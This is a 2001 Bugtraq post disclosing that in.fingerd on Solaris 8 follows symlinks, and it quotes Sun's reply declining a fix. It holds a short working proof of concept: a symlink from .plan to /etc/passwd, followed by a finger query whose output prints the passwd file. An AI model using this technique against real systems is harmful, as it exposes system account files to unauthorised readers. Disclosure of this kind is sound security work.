[20754] in bugtraq
in.fingerd follows sym-links on Solaris 8
daemon@ATHENA.MIT.EDU (Lukasz Luzar)
Thu May 24 13:18:59 2001
Date: Thu, 24 May 2001 18:14:59 +0200 (CEST)
From: Lukasz Luzar <lluzar@developers.of.pl>
To: <bugtraq@securityfocus.com>
Message-ID: <Pine.LNX.4.33.0105241753470.11377-100000@unix.developers.of.pl>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Hello,
Solaris 8 is still vulnerable to the old bug in in.fingerd daemon.
lluzar@sun:~ (101) > ln -s /etc/passwd .plan
lluzar@sun:~ (102) > finger -l lluzar@sun.developers.of.pl
[localhost]
Login name: lluzar In real life: Lukasz Luzar
Directory: /home/lluzar Shell: /bin/tcsh
On since May 19 20:17:04 on pts/70 from unix.developers.of.pl
Mail last read Sat May 19 13:51:12 2001
Plan:
root:x:0:1:Super-User:/root:/sbin/sh
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:
.
.
I believe it could be dangeours in some cases, but people from
Sun says that they won't repair the in.fingerd because:
"There are may be legitimate reasons for finger to follow symlinks. If
finger is considered a security issue, it can be disabled. (..)"
What do you think ?
Cheers,
--
Lukasz Luzar
http://Developers.of.PL/
Crede quod habes, et habes
